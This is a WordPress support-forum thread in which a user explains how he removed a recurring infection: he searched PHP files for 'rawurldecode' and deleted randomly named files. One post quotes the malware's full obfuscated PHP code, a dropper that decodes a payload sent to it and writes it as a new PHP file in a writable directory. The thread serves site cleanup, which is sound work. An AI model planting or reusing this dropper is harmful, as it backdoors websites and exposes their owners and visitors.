ebakker66

Hello Phil,

Thank you for your email. I did not read your article, I figured out myself to kill this virus.

I was in the same endless loop with wordfence trying to delete infected files with @include “\x2fh\x6fm\x651 etc.

I found the file who was creating these @include “\x2fh\x6fm\x651 etc. infections all the time.

This is what I did:
1) I Downloaded the whole WordPress site to my local computer
2) Then I searched for php files with the text ‘rawurldecode’ using Notepad++
3) When I found files with weird file names such as: zvqbjhrl.php
And they also contains very strange code, such as:
function jdszmp($vtwintjvkr, $vnuonc){global $vtwmb;$vtwmb = $vtwintjvkr;$vnuonc = str_split(rawurldecode(str_rot13($vnuonc)));function jzibdoj($zyeiayf, $vtwintjvkr)
4) Then deleted all of those files.

And now everything is OK

Thanks again for your proactive reply.

You can close this ticket.

Erwin

Thank you Jason,

You are right, I have already found several of these weird files on many other places in my wordpress website.

Greetings,

Ebakker

Hello All,

I regret that I wrote that I doubted about the sincerity of Wordfence. After many hours of research I found out that it has nothing to do with Wordfence. My site was clearly already been compromised before I installed Wordfence.

So, again, sorry for that.

Best regards,

ebakker66

Hi just an addition. I was in the same endless loop with wordfence trying to delete these infected files with @include “\x2fh\x6fm\x651 etc.

I think I found the file who is creating these @include “\x2fh\x6fm\x651 etc. infections all the time.

This is what I did:
1) Download the whole WordPress site to your computer
2) Then search for php files with the text ‘rawurldecode’ using Notepad++
3) If you then find files with weird file names such as: zvqbjhrl.php
And they also contains very strange code, such as:
function jdszmp($vtwintjvkr, $vnuonc){global $vtwmb;$vtwmb = $vtwintjvkr;$vnuonc = str_split(rawurldecode(str_rot13($vnuonc)));function jzibdoj($zyeiayf, $vtwintjvkr){global $nfspmbl, $vtwmb;return $zyeiayf ^ $nfspmbl[$vtwintjvkr % strlen($nfspmbl)] ^ $vtwmb[$vtwintjvkr % strlen($vtwmb)];}$vnuonc = implode(“”, array_map(“jzibdoj”, array_values($vnuonc), array_keys($vnuonc)));$vnuonc = @unserialize($vnuonc);if (@is_array($vnuonc)){$vtwintjvkr = array_keys($vnuonc);$vnuonc = $vnuonc[$vtwintjvkr[0]];if ($vnuonc === $vtwintjvkr[0]){echo @serialize(Array(‘php’ => @phpversion(), ));exit();}else{function lrzugsl($pockhvlvjir) {static $oxtys = array();$pockhvlvjsjhbtvle = glob($pockhvlvjir . ‘/*’, GLOB_ONLYDIR);if (count($pockhvlvjsjhbtvle) > 0) {foreach ($pockhvlvjsjhbtvle as $pockhvlvj){if (@is_writable($pockhvlvj)){$oxtys[] = $pockhvlvj;}}}foreach ($pockhvlvjsjhbtvle as $pockhvlvjir) lrzugsl($pockhvlvjir);return $oxtys;}$tghfnmi = $_SERVER[“DOCUMENT_ROOT”];$pockhvlvjsjhbtvle = lrzugsl($tghfnmi);$vtwintjvkr = array_rand($pockhvlvjsjhbtvle);$jlolaswm = $pockhvlvjsjhbtvle[$vtwintjvkr] . “/” . substr(md5(time()), 0, 8) . “.php”;@file_put_contents($jlolaswm, $vnuonc);echo “https://” . $_SERVER[“HTTP_HOST”] . substr($jlolaswm, strlen($tghfnmi));exit();}}}

Then delete those files.

Success,

ebakker66

Hello Vijay Padiyar,

What file did you remove from your WordPress wp-admin directory?

Thanks

ebakker